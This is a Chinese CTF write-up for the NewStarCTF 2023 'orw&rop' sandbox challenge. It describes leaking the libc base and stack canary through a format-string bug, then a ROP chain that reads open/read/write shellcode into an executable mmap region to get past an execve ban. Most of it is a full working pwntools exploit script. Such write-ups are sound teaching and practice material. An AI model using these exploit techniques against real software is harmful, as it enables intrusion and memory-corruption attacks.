NewStarCTF 2023 公开赛道 orw&rop
沙箱题,知识禁用了execve,所以使用orw即可
思路
-
程序mmap了一段地址,权限是7,也就是可读可写可执行,我们把orw布置到这里就行啦,然后控制程序执行流(也就是rip指针)到这里就行啦。
-
第一次输入,有格式化字符串漏洞,利用他来泄露libc基址(通过libc_start_main),和canary,方便后面利用栈溢出漏洞
-
第二次输入存在栈溢出漏洞,我们需要把orw的shellcode写进mmap的地址,那么我们就需要一个read函数,
read(0,target_addr,0x1000)。所以栈溢出就是去执行我们写的read函数,把读orw写进target addr
exp
from pwn import *
from pwn import p64,u64,p32,u32,p8
context.terminal = ["tmux","sp","-h"]
context(log_level="debug",os="linux",arch="amd64")
# io=remote('node5.buuoj.cn',27743)
io = process("./pwn")
elf=ELF("./pwn")
libc=ELF('/ctf/tools/libc.so.6')
sla = lambda x,y : io.sendlineafter(x,y)
sa = lambda x,y : io.sendafter(x,y)
sl = lambda x : io.sendline(x)
sd = lambda x : io.send(x)
gd = lambda : gdb.attach(io)
inter = lambda : io.interactive()
def get_addr() :
return u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
def pwn():
pause()
# 泄露libc基址和canary
sla(b"sandbox",b"aa%11$pbb%33$p")
io.recvuntil(b"aa")
canary = int(io.recv(18),16)
print("canary ----> "+hex(canary))
io.recvuntil(b"bb")
libc_start_main = int(io.recv(14),16) - 128
print("libc_start_main+128 -----> "+hex(libc_start_main + 128))
libc_base = libc_start_main - libc.sym["__libc_start_main"]
pop_rdi = 0x000000000002a3e5 + libc_base
pop_rsi = 0x000000000002be51 + libc_base
pop_rdx_r12 = 0x000000000011f497 + libc_base
read = libc_base + libc.sym["read"]
addr = 0x66660000
len = 0x1000
# 栈溢出payload
payload = b"a"*(0x30-8) + p64(canary) + b"a"*8
payload += p64(pop_rdi) + p64(0)
payload += p64(pop_rsi) + p64(addr)
payload += p64(pop_rdx_r12) + p64(len) + p64(0)
payload += p64(read) + p64(addr)
pause()
sla(b"now",payload)
# orw shellcode
shellcode = shellcraft.open("flag")
shellcode += shellcraft.read(3,addr+0x500,0x100)
shellcode += shellcraft.write(1,addr+0x500,0x100)
shellcode = asm(shellcode)
pause()
sl(shellcode)
inter()
pwn()
欢迎不懂的师傅来找我讨论
浙公网安备 33010602011771号